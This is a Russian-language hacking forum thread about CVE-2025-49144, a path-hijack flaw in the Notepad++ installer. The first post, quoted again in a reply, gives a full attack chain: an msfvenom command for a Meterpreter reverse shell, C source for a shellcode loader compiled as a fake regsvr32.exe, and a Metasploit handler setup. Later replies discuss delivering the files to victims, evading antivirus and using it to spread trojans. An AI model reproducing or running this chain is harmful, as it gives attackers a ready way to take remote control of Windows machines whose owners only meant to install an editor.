CVE-2025-49144 у notepad++

fox1a · 26.06.2025

Проблема в установщике notepad++ позволяет не только выполнять вредоносный код, но обходить AV и повышать привилегии. (CVE-2025-49144)

Иногда можно сказать "черту крипторы, когда есть такая возможность".
Она заключается в установке notepad++.

Дело в том, что во время установки на windows, он вызывает regsvr32.exe, но проблема в том, что в установщике, не указан полный путь к этому файлу.

Следовательно атакующий может заранее поместить фейковый regsvr32 в папку с установщиком и тогда вместо вызова C:\Windows\System32\regsvr32.exe, установщик обратится к regsvr32.exe атакующего.
А вредоносный код, сработает как легитимный файл.

Как провести атаку как на скриншоте?
Получаем shellcode

Bash:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-IP> LPORT=4444 -f c > shellc.txt

Создаём файл example.c с С кодом:

C:

#include <windows.h>
#include <stdio.h>

unsigned char shellcode[] = {
    // тут ваш шеллкод из shellc.txt
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
    // ...
};

int main() {
    void *exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) return -1;
    memcpy(exec, shellcode, sizeof(shellcode));
    ((void(*)())exec)();
    return 0;
}

Собираем это всё в regsvr32.exe

Bash:

x86_64-w64-mingw32-gcc example.c -o regsvr32.exe -mwindows

И запускаем установщик notepad++ на целевой машине.

Далее запускаем meterpreter:

Bash:

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR-IP>
set LPORT 4444
run

proexp · 26.06.2025

fox1a сказал(а):
Посмотреть вложение 108600
Уязвимость в notepad++ позволяет не только выполнять вредоносный код, но обходить AV и повышать привилегии. (CVE-2025-49144)

Иногда можно сказать "черту крипторы, когда есть такая уязвимость".
Она заключается в установке notepad++.

Дело в том, что во время установки на windows, он вызывает regsvr32.exe, но проблема в том, что в установщике, не указан полный путь к этому файлу.

Следовательно атакующий может заранее поместить фейковый regsvr32 в папку с установщиком и тогда вместо вызова C:\Windows\System32\regsvr32.exe, установщик обратится к regsvr32.exe атакующего.
А вредоносный код, сработает как легитимный файл.

Как провести атаку как на скриншоте?
Получаем shellcode
Bash:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-IP> LPORT=4444 -f c > shellc.txt
Создаём файл example.c с С кодом:
C:
#include <windows.h>
#include <stdio.h>

unsigned char shellcode[] = {
    // тут ваш шеллкод из shellc.txt
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
    // ...
};

int main() {
    void *exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) return -1;
    memcpy(exec, shellcode, sizeof(shellcode));
    ((void(*)())exec)();
    return 0;
}
Собираем это всё в regsvr32.exe
Bash:
x86_64-w64-mingw32-gcc example.c -o regsvr32.exe -mwindows
И запускаем установщик notepad++ на целевой машине.

Далее запускаем meterpreter:
Bash:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR-IP>
set LPORT 4444
run

сколько файлов на выходе получается?

fox1a · 26.06.2025

proexp сказал(а):

сколько файлов на выходе получается?

Установщик и regsvr32.exe
Установщик сам запустит regsvr32

MetadorAPT · 26.06.2025

товарищи, это не уязвимость а какая то по**ень, надо дать статус дебила, тому кто оформил как CVE

fox1a · 26.06.2025

Тем не менее это hijacking за счёт официального установщика notepad
Такая проблема имеет место быть в cve и его могут вполне использовать например для распространения трояна.

Adderall · 26.06.2025

Зарание установим винду с rootkit и запусти нотпад++ эфект будет такой же

MetadorAPT · 26.06.2025

fox1a сказал(а):

Тем не менее это hijacking за счёт официального установщика notepad
Такая проблема имеет место быть в cve и его могут вполне использовать например для распространения трояна.

у меня такое ощущение, что большинство из вас люди которые в принципе в этом не копались, по той причине, что каждый инсталлер имеет хотя бы одну подобную уязвимость, за исключением серьезных аудированных PE, например у crowdstrike edr инсталлера такого нет совершенно, если же брать все подряд zoom, slack, teams, 7z какие то сеты дров и тд, все со сто процентами имеет dllhijacking, или exehijacking, это никак не назвать "cve rce", это просто не прописанные пути и совершенно никак нельзя это использовать в бою, без обхода chrome/chromium/firefox блокировок, как ты ее доставишь? может опишешь метод

fox1a · 26.06.2025

MetadorAPT сказал(а):

без обхода chrome/chromium/firefox блокировок, как ты ее доставишь? может опишешь метод

Достаточно того, что он будет находиться в одной директории с официальным инстраллером. То есть сам легитимный инстраллер становится причиной запуска трояна и без всякого смартскрина

fox1a · 26.06.2025

Adderall сказал(а):

Зарание установим винду с rootkit и запусти нотпад++ эфект будет такой же

Возможно я плохо подношу информацию)

Potato07 · 27.06.2025

regsvr32.exe рядом с установщиком разве не отлетит с первого же АВ? Если даже получится доставить файлы на тачку жертвы

proexp · 27.06.2025

fox1a сказал(а):

Установщик и regsvr32.exe
Установщик сам запустит regsvr32

плохо, нужно что бы 1 файлом было все.

weaver · 27.06.2025

Может кому-то и пригодится бага в качестве повышения привилегий до nt authority\system, уязвимые драйверы грузят и ничего. И notepad++ будут грузить.

https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-9vx8-v79m-6m24

CVE-2025-49144 у notepad++

fox1a

floppy-диск

proexp

(L1) cache

fox1a

floppy-диск

MetadorAPT

RAID-массив

fox1a

floppy-диск

Adderall

RAM

MetadorAPT

RAID-массив

fox1a

floppy-диск

fox1a

floppy-диск

Potato07

HDD-drive

proexp

(L1) cache

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3